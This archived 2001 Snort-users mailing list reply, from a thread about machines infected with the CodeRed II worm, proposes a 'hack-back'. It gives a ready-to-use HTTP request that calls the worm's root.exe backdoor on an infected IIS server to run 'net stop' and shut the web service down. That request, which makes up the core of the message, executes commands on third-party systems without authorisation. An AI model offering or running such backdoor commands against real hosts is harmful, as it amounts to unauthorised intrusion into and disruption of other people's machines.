Snort mailing list archives

Re: What to do with CodeRed(II) logged hosts ?


From: Thierry Coopman <calvin () skynet be>
Date: Mon, 6 Aug 2001 15:34:33 +0200

At 11:59 +0200 06-08-2001, ks () schuricht de wrote:


But what i do with hosts infected (at this time i only reject all traffic
from them)?


maybe send the folowing http request

http://ipaddress/c/inetpub/scripts/root.exe?/c+"net%20stop%20inetinfo.exe";

this should stop IIS on the server and hopefully the worm, and will make sure the admins pay attention to the machine :))

--
--
Thierry Coopman - THieRRy () sKyNet be -
My opinions are personal, and have really nothing or nothing to do with VMS-keytrade.com!

I realise computers suck. The only reason why they are a hobby
of mine is because I enjoy pain!

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users


Current thread: